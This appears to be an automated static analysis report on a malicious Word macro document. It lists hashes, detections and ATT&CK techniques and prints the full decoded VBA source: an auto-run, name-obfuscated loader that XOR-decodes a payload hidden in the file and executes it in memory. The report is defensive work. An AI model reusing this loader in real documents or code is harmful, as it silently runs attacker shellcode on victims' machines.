Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73edebdd13738f52…

MALICIOUS

Office (OLE)

37.2 KB Created: 2017-07-25 10:47:00 Authoring application: Microsoft Office Word First seen: 2017-08-08
MD5: b95ce808b0239fb1ea377c5149cfeef8 SHA-1: bb0307985a32e8e4b626012d0be952e67276f66e SHA-256: 73edebdd13738f529aa10ba380aad9b28c3c65fea605bf9d1958142208d10e92
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The macros utilize VirtualAlloc and CreateThread API calls, indicating an attempt to allocate memory and execute arbitrary code. This behavior is consistent with a downloader that fetches and runs a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Powload-6809817-0'. The presence of the 'macros.bas' file further supports the macro-based execution.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
    xDevBalyBLEFtnxpHiOKZbXczrTn
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
    Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4488 bytes
SHA-256: 9980bba180f5fa652fa6e7f1b20240562ed786f5e3dd26e3af6825bfa641e4b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
36 of 71 identifiers look randomly generated (e.g. 'lPCvkuuqXlJyPtycvRybiUMiAaNwuVicvuJWsciN') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function aQHJDH Lib "kernel32" Alias "CreateThread" (ByVal ZWANBNKHxD As Long, ByVal ApPjvNBo As Long, ByVal MJPpwUNEjK As LongPtr, dxpYB As Long, ByVal kUxFfJIjAynNvzmiezqhkrH As Long, fyNCd As Long) As LongPtr
Private Declare PtrSafe Function GGaggVvzQNkOVtQIuBSnwzHVf Lib "kernel32" Alias "VirtualAlloc" (ByVal pVymXGUabJbSNGyVXTch As Long, ByVal bSDUuc As LongPtr, ByVal LtEAUnjU As Long, ByVal izKYxmqisRdSfCaaVCodV As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal DEMoHfAXzwEoO As LongPtr, ByVal sjFPBvCCYpFQDz As LongPtr, ByVal LVRMQWgljElIvrHoRNGILXzBzQaGx As String, ByVal QBaXOANBYxmYvkpNglqbO As LongPtr, ByRef WRnNwp As LongPtr) As LongPtr
#Else
Private Declare Function aQHJDH Lib "kernel32" Alias "CreateThread"  (ByVal ZWANBNKHxD As Long, ByVal ApPjvNBo As Long, ByVal MJPpwUNEjK As Long, dxpYB As Long, ByVal kUxFfJIjAynNvzmiezqhkrH As Long, fyNCd As Long) As Long
Private Declare Function GGaggVvzQNkOVtQIuBSnwzHVf Lib "kernel32" Alias "VirtualAlloc" (ByVal pVymXGUabJbSNGyVXTch As Long, ByVal bSDUuc As Long, ByVal LtEAUnjU As Long, ByVal izKYxmqisRdSfCaaVCodV As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal DEMoHfAXzwEoO As Long, ByVal sjFPBvCCYpFQDz As Long, ByVal LVRMQWgljElIvrHoRNGILXzBzQaGx As String, ByVal QBaXOANBYxmYvkpNglqbO As Long, ByRef WRnNwp As Long) As Long
#End If

Const sNsJnkihPbkPGdTkxeg = &H1000
Const OmrVsuNVhFQGfobtqta = &H40

Public Sub xDevBalyBLEFtnxpHiOKZbXczrTn()
    Dim ZjsslkibJyUCfVJS() As Byte

    ZjsslkibJyUCfVJS = jxOkpKRdprQXYzxFMqwSUnLnkvfD(ActiveDocument.FullName)
    Dim flLciYDZXvFbWkhYa As String
    flLciYDZXvFbWkhYa = StrConv(ZjsslkibJyUCfVJS, 64)
    
    Dim BmmhcooYJThUgokYlH
    BmmhcooYJThUgokYlH = Split(flLciYDZXvFbWkhYa, "lPCvkuuqXlJyPtycvRybiUMiAaNwuVicvuJWsciNJKvlNCosnJnVjkCqdtVjGYWbcHcvKCJtJKsxzAvXMviLImTlRtTZhYgKOtigzSHLZUmyReRCYXxlPltQNQDrIKmKDHJfsoxTNxLOautNCrajBVVDartIpqcoIBVkvM")

    Dim vQkPtnPDaNoNEeshFo As String
    Dim VLAZTE As String
    Dim nBklnKatYgv As String
    VLAZTE = StrConv(StrConv(BmmhcooYJThUgokYlH(UBound(BmmhcooYJThUgokYlH)), 64), 128)
    nBklnKatYgv = Mid$(VLAZTE, 3, Len(VLAZTE))

    vQkPtnPDaNoNEeshFo = qKNzdvfQwqgpv("JzEyszFQsxQPr", nBklnKatYgv)
    
    #If VBA7 Then
        Dim oSNfYMzNTyDYSzPgv As LongPtr
        Dim qSxnZjkEKrbAUdd As LongPtr
    #Else
        Dim oSNfYMzNTyDYSzPgv As Long
        Dim qSxnZjkEKrbAUdd As Long
    #End If

    oSNfYMzNTyDYSzPgv = GGaggVvzQNkOVtQIuBSnwzHVf(0, Len(vQkPtnPDaNoNEeshFo), sNsJnkihPbkPGdTkxeg, OmrVsuNVhFQGfobtqta)
    qSxnZjkEKrbAUdd = NtWriteVirtualMemory(-1, oSNfYMzNTyDYSzPgv, vQkPtnPDaNoNEeshFo, Len(vQkPtnPDaNoNEeshFo), 0)
    qSxnZjkEKrbAUdd = aQHJDH(0, 0, oSNfYMzNTyDYSzPgv, 0, 0, 0)
End Sub

Public Function jxOkpKRdprQXYzxFMqwSUnLnkvfD(ByVal NgEKoyeGFVeCkzlkPpogzGQiv As String) As Byte()
    Dim VLAZTE As Long
    Dim nBklnKatYgv() As Byte
    VLAZTE = FreeFile
    If LenB(Dir(NgEKoyeGFVeCkzlkPpogzGQiv)) Then
        Open NgEKoyeGFVeCkzlkPpogzGQiv For Binary Access Read As VLAZTE
        ReDim nBklnKatYgv(LOF(VLAZTE) - 1&) As Byte
        Get VLAZTE, , nBklnKatYgv
        Close VLAZTE
    Else
        Err.Raise 53
    End If
    jxOkpKRdprQXYzxFMqwSUnLnkvfD = nBklnKatYgv
    Erase nBklnKatYgv
End Function

Public Sub Document_Open()
    xDevBalyBLEFtnxpHiOKZbXczrTn
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function qKNzdvfQwqgpv(lCsfGczoWXbY As String, FnNAAvQfsilxDNORWv As String) As String
    Dim PZzxaSzsSbOPyeUADIPGTEjSugI As Long
    Dim oLxZCg As String
    Dim CfQNIadYd As Integer, xywgMWE As Integer, a As Long

    For PZzxaSzsSbOPyeUADIPGTEjSugI = 1 To Len(FnNAAvQfsilxDNORWv)
        a = PZzxaSzsSbOPyeUADIPGTEjSugI Mod Len(lCsfGczoWXbY)
        If a = 0 Then a = Len(lCsfGczoWXbY)
        
        CfQNIadYd = Asc(Mid$(FnNAAvQfsilxDNORWv, PZzxaSzsSbOPyeUADIPGTEjSugI, 1))
        xywgMWE = Asc(Mid$(lCsfGczoWXbY, a, 1))
        oLxZCg = oLxZCg + Chr(CfQNIadYd Xor xywgMWE)
    Next PZzxaSzsSbOPyeUADIPGTEjSugI
    
   qKNzdvfQwqgpv = oLxZCg
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.